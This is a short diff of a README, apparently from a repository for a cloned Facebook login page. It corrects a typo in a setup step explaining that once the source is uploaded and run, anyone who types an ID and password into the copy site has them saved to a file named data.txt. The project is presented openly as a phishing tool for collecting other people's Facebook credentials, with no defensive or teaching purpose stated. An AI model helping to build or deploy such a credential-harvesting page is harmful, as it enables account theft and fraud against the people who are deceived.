TheGreen444/Facebook-login-form-sourceCode.../README.md

 Step 3: upload sourse code file and run it

-  < Now you have a facebook copy website and if some inputs there the id and pass will come to your file data.txt >
+  < Now you have a facebook copy website and if someone inputs there the id and pass will come to your file data.txt >

                                               THANKYOU    -- TheGreen